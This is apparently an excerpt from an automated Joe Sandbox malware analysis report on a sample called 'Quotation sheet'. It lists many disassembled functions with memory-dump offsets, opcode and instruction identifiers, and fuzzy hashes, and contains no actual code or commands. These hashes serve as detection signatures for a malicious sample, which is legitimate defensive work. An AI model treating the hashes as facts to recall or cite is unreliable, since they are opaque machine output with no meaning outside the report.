                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2da7348e2922f1c29cc1006ec833bf85eeea32d1a79093de3ac34b6425ca1ce9
                                                                                                                        • Instruction ID: 3acafa8d420fb858073688a69618db47d30969990391ed0e4b6a4f4d5aa49a18
                                                                                                                        • Opcode Fuzzy Hash: 2da7348e2922f1c29cc1006ec833bf85eeea32d1a79093de3ac34b6425ca1ce9
                                                                                                                        • Instruction Fuzzy Hash: 8301F979F0A105AFC71A6B55D8243D97BF0DB88340F1D4867E959E3294F23185158B90
                                                                                                                        Function 0173D745 Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_173d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f00ea60f623b271e8c21525480a7f47e8064176783a132ff46fe15501a2903e1
                                                                                                                        • Instruction ID: aebf0376577973c255c21bc13a9965d6cddde722c45f5087612facb1484665df
                                                                                                                        • Opcode Fuzzy Hash: f00ea60f623b271e8c21525480a7f47e8064176783a132ff46fe15501a2903e1
                                                                                                                        • Instruction Fuzzy Hash: B1012B71404380DAF7324EA9CD84B66FF98DFC1374F48C55AEE090A293D7799440CAB1
                                                                                                                        Function 094DD480 Relevance: .0, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 969c38d9cdb9b424de111834106d707f6268384707c321887dfd83bd0c163075
                                                                                                                        • Instruction ID: 00c7390ddff4605eaaebcd95bb9d07e4989c4fbc140f651c87ec5ad76dfca2c0
                                                                                                                        • Opcode Fuzzy Hash: 969c38d9cdb9b424de111834106d707f6268384707c321887dfd83bd0c163075
                                                                                                                        • Instruction Fuzzy Hash: EE017178E09208EFD760DFA9D4513AEBBF9FB48304F10915AD408D3785DB756A52CB81
                                                                                                                        Function 094D2D78 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 478179e0ddd31dadad5d38dcd07976666e20559d8405badf926bc78ca0c6b69a
                                                                                                                        • Instruction ID: f38c39fb45a3d8a6043c1aace8ac52ec93039468cfbd1249c49ff7c2107ae0b9
                                                                                                                        • Opcode Fuzzy Hash: 478179e0ddd31dadad5d38dcd07976666e20559d8405badf926bc78ca0c6b69a
                                                                                                                        • Instruction Fuzzy Hash: A1019E70E0021A9FDB04EF68C8117AEBBB5EF48304F108529D825F7391DBB49A01DF94
                                                                                                                        Function 094D2E71 Relevance: .0, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b6c3ddf901d8fcd74b04ff41ead39eabfb5abed014384a2dba809c1da2b559b3
                                                                                                                        • Instruction ID: f5b94913a3b4c9826a59cb4c345f6817e51c5dd6aa340c1d146991fe818d663a
                                                                                                                        • Opcode Fuzzy Hash: b6c3ddf901d8fcd74b04ff41ead39eabfb5abed014384a2dba809c1da2b559b3
                                                                                                                        • Instruction Fuzzy Hash: 7E01D432A1430A9FCF10DFA5D8449D9BB76FF89304F01C629E50167114E770A599CBA0
                                                                                                                        Function 094D4A50 Relevance: .0, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 33f6613e2b7f70e2aacc12d6f4c915ee13c00ab3175a1808379e1e8dc78dbb14
                                                                                                                        • Instruction ID: b48881640e789561b1185505ba6e3c16588c41afd9470c3f3450fcfe5842be06
                                                                                                                        • Opcode Fuzzy Hash: 33f6613e2b7f70e2aacc12d6f4c915ee13c00ab3175a1808379e1e8dc78dbb14
                                                                                                                        • Instruction Fuzzy Hash: BAF044343152118FC7449B6DC458A6A77EA9FCD610F1981BAEA09CB374DE75DC0287E0
                                                                                                                        Function 094DD490 Relevance: .0, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d711fc372a7ca5dc21fc756da4367c870e88f3c2fd1e4b41c5d9f3d2ab8143a
                                                                                                                        • Instruction ID: f851c19a0afca142500f3d20720cd38155a1dd902894778f459a96b4f139a87d
                                                                                                                        • Opcode Fuzzy Hash: 0d711fc372a7ca5dc21fc756da4367c870e88f3c2fd1e4b41c5d9f3d2ab8143a
                                                                                                                        • Instruction Fuzzy Hash: 9E016278D05208DFD760DFA8D4517AEB7F9EB48300F10916AD41993785EB756E41CB80
                                                                                                                        Function 0173D744 Relevance: .0, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2336953708.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_173d000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1398be545ccbc2429c628adff7f01e0384f7d2590f6b2406ad609093f860aa69
                                                                                                                        • Instruction ID: f91093de2f561182acbc27cb59715c6abd79bb067699de9d4065b7e466ecf6f4
                                                                                                                        • Opcode Fuzzy Hash: 1398be545ccbc2429c628adff7f01e0384f7d2590f6b2406ad609093f860aa69
                                                                                                                        • Instruction Fuzzy Hash: 85F062714053849AE7218E59D984B62FF98EB81774F18C45AEE084A297C3799844CBB1
                                                                                                                        Function 094DC659 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 820efcc5c23f5038175dbf334d100e23dbf609021da1caff420d19bad9d2bbed
                                                                                                                        • Instruction ID: a1a0e753d7659e8c4d6c75a87b7863076b921c26934e0f44e665362ec8436d96
                                                                                                                        • Opcode Fuzzy Hash: 820efcc5c23f5038175dbf334d100e23dbf609021da1caff420d19bad9d2bbed
                                                                                                                        • Instruction Fuzzy Hash: CCF06D78E0A244EFDB00CFB5C5912ADBBB4EB5A342F05A0DBC48893282D6350A45CF41
                                                                                                                        Function 094DD057 Relevance: .0, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 15dee206927352c4eab01c083cf53b56a6d90922118b580ebec909778b15a8d3
                                                                                                                        • Instruction ID: e141bd2cf1891fc56875464e25f0f93cf64386c867acb81dc9a1f65e7b16e73c
                                                                                                                        • Opcode Fuzzy Hash: 15dee206927352c4eab01c083cf53b56a6d90922118b580ebec909778b15a8d3
                                                                                                                        • Instruction Fuzzy Hash: 9EF0C878D0D2499FCB16CFA9D8446BCBBB4BB8B318F04929AC42457795D7350603DB80
                                                                                                                        Function 094DC548 Relevance: .0, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da9198144c8ed47fad9bc678377bbdcd3998b6bfdc4fad975ada3ba90305a9b9
                                                                                                                        • Instruction ID: 9394e57c9f57c379af756f7cf4f323669a8c364288f62b2ed60e97ea46a3f2b9
                                                                                                                        • Opcode Fuzzy Hash: da9198144c8ed47fad9bc678377bbdcd3998b6bfdc4fad975ada3ba90305a9b9
                                                                                                                        • Instruction Fuzzy Hash: 9EF0243A90A108EBC704CFA4D8A2B9DFBB9EF42305F00519ED80817760EB328E52C785
                                                                                                                        Function 094DC503 Relevance: .0, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 98a6610bd41fe660731d52d2ee9788449deed050a966ca89ae977e1fa0c5c86c
                                                                                                                        • Instruction ID: 4b65c0be72e7e294f46031c28d57aa4caf267f61da8887360fb3ba9bb5b87d47
                                                                                                                        • Opcode Fuzzy Hash: 98a6610bd41fe660731d52d2ee9788449deed050a966ca89ae977e1fa0c5c86c
                                                                                                                        • Instruction Fuzzy Hash: C1F0A77680B20CEBC760DFA4D8617AD7BFCDB07305F0465D6E44593210EA314D00CB95
                                                                                                                        Function 094DDC80 Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 74d7de3d95acd86d24cf8393b50dcf2e3d58e336921388c3a1681c4e93904900
                                                                                                                        • Instruction ID: 5e734af39cca3b00d47c5a9484026d0c4c25a557e8c4e3e62368923f8bac7efc
                                                                                                                        • Opcode Fuzzy Hash: 74d7de3d95acd86d24cf8393b50dcf2e3d58e336921388c3a1681c4e93904900
                                                                                                                        • Instruction Fuzzy Hash: 54F08932904108BFDF08DF59D86199E7FFEDF44214F04C16BE405D7261EA31D9048750
                                                                                                                        Function 094DE85B Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 353ed29f60aa1b033ad1bc8997d814b01489def27511e3d873373e0139d96b66
                                                                                                                        • Instruction ID: 3739a149bd69f3a11248a72c27ea9b1b00d58e0e069c81b87583108821ce4c66
                                                                                                                        • Opcode Fuzzy Hash: 353ed29f60aa1b033ad1bc8997d814b01489def27511e3d873373e0139d96b66
                                                                                                                        • Instruction Fuzzy Hash: C0F096B8C0D1499BCB14CF94E8512BEBFB5EB46350F14919BE8256B351D7360B02CB40
                                                                                                                        Function 094DE868 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4261a19e71a99a3c72de7fab1e290afcf76f6ad8f6ac97cca3766ecad0865559
                                                                                                                        • Instruction ID: db650d945e2fb125d574791198d4f43bdcd4c4a17ea5159b30201b2fb348336f
                                                                                                                        • Opcode Fuzzy Hash: 4261a19e71a99a3c72de7fab1e290afcf76f6ad8f6ac97cca3766ecad0865559
                                                                                                                        • Instruction Fuzzy Hash: 27F05478D0A208DFDB04DF95E8511BEBBF9FB49340F009566E818A7300D7711B02DB50
                                                                                                                        Function 094DF1A0 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ccca13d8467d40b552f16d31eefbbcf8679993a11b84682536f9a4aa4a80c0bf
                                                                                                                        • Instruction ID: 1a4ce48f85c391373e957c9fa1ed37dfc34468d8debf54330c699fd3998c7f26
                                                                                                                        • Opcode Fuzzy Hash: ccca13d8467d40b552f16d31eefbbcf8679993a11b84682536f9a4aa4a80c0bf
                                                                                                                        • Instruction Fuzzy Hash: E3F0203882E3489FC350EFB4D4546AEBFB8EB0A300F1111EAD80593385EB304E04CB90
                                                                                                                        Function 094DD068 Relevance: .0, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 92b31044c393ffe9c1eaa4c8656aeae1d5b9c39e9eb45c86e6459c46634a65ae
                                                                                                                        • Instruction ID: 26563ab2846b9a323b15a7f77187f3a4914b4fa00fd10ad4373cf476fc288930
                                                                                                                        • Opcode Fuzzy Hash: 92b31044c393ffe9c1eaa4c8656aeae1d5b9c39e9eb45c86e6459c46634a65ae
                                                                                                                        • Instruction Fuzzy Hash: 37F05478D09208DFCB05DFA5D4106BDBBF8FB89308F00956BD81893745D7711A02DB80
                                                                                                                        Function 094DDF08 Relevance: .0, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a46fe3db5ad7894e4a8c335d29417398346df894e8dda31161db1b7ee284e3be
                                                                                                                        • Instruction ID: eef57ade2392b3dc73b33279f0f9a8ccf7c9bee3caa3088051ebcfaf086de046
                                                                                                                        • Opcode Fuzzy Hash: a46fe3db5ad7894e4a8c335d29417398346df894e8dda31161db1b7ee284e3be
                                                                                                                        • Instruction Fuzzy Hash: 01F03A39818108EFCF01DF80D845EA8BF75FB48310F15C099E90417772C7329A62EB80
                                                                                                                        Function 094DF0BB Relevance: .0, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e47e04f98b19f56f541ea4ef3d9d2d991119cfbf4d5601521725a4cf8fc8c825
                                                                                                                        • Instruction ID: 09ed0d124afd51d0afdcacc8a0ad19623447c9a489fe9576bc85eda819856d9e
                                                                                                                        • Opcode Fuzzy Hash: e47e04f98b19f56f541ea4ef3d9d2d991119cfbf4d5601521725a4cf8fc8c825
                                                                                                                        • Instruction Fuzzy Hash: 45F09A38D1A208DFDB10DFA5D4806ADBBB8EB49304F10D0EBC80AA3300D7311A498B40
                                                                                                                        Function 094DF068 Relevance: .0, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e9d91d6ff237f1b59506cc41928b5a44281f625161f73e2c5c46778ad9e3508
                                                                                                                        • Instruction ID: 0ab1b1671e61f81d042e86fd1e7a2f5fd99ecdb454f271735d92219a2ffaa066
                                                                                                                        • Opcode Fuzzy Hash: 0e9d91d6ff237f1b59506cc41928b5a44281f625161f73e2c5c46778ad9e3508
                                                                                                                        • Instruction Fuzzy Hash: A1F0377CD1A208EFD751DFA5D4516ADB7B8EB4D304F1095EBD409A3301E7315A45CB81
                                                                                                                        Function 094DF0C8 Relevance: .0, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1c4935eee9874045ca5fcbc7275c9e55e68342b845fb87f8e2183640b58e3e32
                                                                                                                        • Instruction ID: 1b4b7be39c4395062b65d31a0c078976b5594b293d953d90990c1007a81d416c
                                                                                                                        • Opcode Fuzzy Hash: 1c4935eee9874045ca5fcbc7275c9e55e68342b845fb87f8e2183640b58e3e32
                                                                                                                        • Instruction Fuzzy Hash: D8F0377CD1A208EFD751DFA5D4516ADB7B8EB49304F10D1EBD809A3301D7355A45CB80
                                                                                                                        Function 094DC4A0 Relevance: .0, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5358e36082bed4e4d06c830a964687345e7ebe9b31357a4b8fe232f77317b7b2
                                                                                                                        • Instruction ID: 65f41d7a413d607e9139e90311dac86c8f2c43416ef99e6c1ccd6196eff578dd
                                                                                                                        • Opcode Fuzzy Hash: 5358e36082bed4e4d06c830a964687345e7ebe9b31357a4b8fe232f77317b7b2
                                                                                                                        • Instruction Fuzzy Hash: 77F0ED3A94A208DBD310DFB8D49977ABBFAE74A305F105299D809A3354DB355E01CBD4
                                                                                                                        Function 094DC668 Relevance: .0, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 82a54ba0de299fe11f1628bebc8ae7af1710576419d7f831a69de37805ae1fed
                                                                                                                        • Instruction ID: 2903da5117ada184728a6522a5657c9277a938b1644c75b739220da4ed530fa7
                                                                                                                        • Opcode Fuzzy Hash: 82a54ba0de299fe11f1628bebc8ae7af1710576419d7f831a69de37805ae1fed
                                                                                                                        • Instruction Fuzzy Hash: 55F0F878D0A208EBCB40DFA5D4916ADBBB8EB5A342F01A1AAD848A3240DB355A41CB40
                                                                                                                        Function 094D4908 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 03d7a405a79330891244ca1eb337459e3a907989e061c438f26fa3f6bc462952
                                                                                                                        • Instruction ID: a0a6ab81e2e54143c087a714bebfe797928835161cb656c937c7b9aef0909fa4
                                                                                                                        • Opcode Fuzzy Hash: 03d7a405a79330891244ca1eb337459e3a907989e061c438f26fa3f6bc462952
                                                                                                                        • Instruction Fuzzy Hash: 72E06D71B00A114B4B1CEBBFA45446AF6EBAFC8514318C16ED50DCBB28ED3298418680
                                                                                                                        Function 094DEE60 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 199d70f0531a043b144956594153765ff25696a4b3a4b0b5891175795c6d7700
                                                                                                                        • Instruction ID: 9b7522cf9ee5d0572c2815cb782b8695b7f28ca0209b31829417c7bd7479c727
                                                                                                                        • Opcode Fuzzy Hash: 199d70f0531a043b144956594153765ff25696a4b3a4b0b5891175795c6d7700
                                                                                                                        • Instruction Fuzzy Hash: 34F0DAB4D0420A9FDB54DFA9C851AAFBFF4EB48300F5049AAE518E7300E77196018B91
                                                                                                                        Function 094D0E94 Relevance: .0, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e19f87bf8deb03d6a90eaec5c890e24dde8b2200675ebaed36475bdefa966163
                                                                                                                        • Instruction ID: 729136c0f3aa3dff1bd3d62a9987d905a27758b126401edab6898b74cafacb73
                                                                                                                        • Opcode Fuzzy Hash: e19f87bf8deb03d6a90eaec5c890e24dde8b2200675ebaed36475bdefa966163
                                                                                                                        • Instruction Fuzzy Hash: 54F0E53020A345CFC31A9B38D4A84263BE5EF4634070498EFE959CB761CA75DC85C741
                                                                                                                        Function 094DE807 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6bdc68b06a8e8b263b5a6318414ef235b170503d2e7593eea57921de0ebbbbf5
                                                                                                                        • Instruction ID: 8c45fe7e1118ea69e10c713f7e5d25d337f40501b7511106fa600394d6a2b8ce
                                                                                                                        • Opcode Fuzzy Hash: 6bdc68b06a8e8b263b5a6318414ef235b170503d2e7593eea57921de0ebbbbf5
                                                                                                                        • Instruction Fuzzy Hash: 8DF0D478D09208EFCB50DFA8E85169DBBB4FB49310F10D1AAE848E7351DB359A42DF90
                                                                                                                        Function 094D4AE0 Relevance: .0, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b3dbdd5ae71781d1444b5d6c9ceada297af7608f90d79fcf615da6fafab8785
                                                                                                                        • Instruction ID: 8e4edb56286e1bdce6d3158dce4edc6379718a47d3d549ff3b4d1bac2b4b3555
                                                                                                                        • Opcode Fuzzy Hash: 1b3dbdd5ae71781d1444b5d6c9ceada297af7608f90d79fcf615da6fafab8785
                                                                                                                        • Instruction Fuzzy Hash: 23E0D836305A1143DA2A2B1AECA875D3299DBD5625F18402AE116C6B74CA798842C399
                                                                                                                        Function 094DEE53 Relevance: .0, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2362099019.00000000094D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_94d0000_Quotation sheet.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 79082e4d639dda3d01846edc283234d3e1030b769397755721e449f315002e7b
                                                                                                                        • Instruction ID: fa52b793ba8938a64616fda358271302385b3dcf7605b673aa7a65d6d9011ead
                                                                                                                        • Opcode Fuzzy Hash: 79082e4d639dda3d01846edc283234d3e1030b769397755721e449f315002e7b
                                                                                                                        • Instruction Fuzzy Hash: 9DF017B491424A9FEB24CFA9C441AAFBFF1EB09310F1145AAE511EB341DB758502CB90
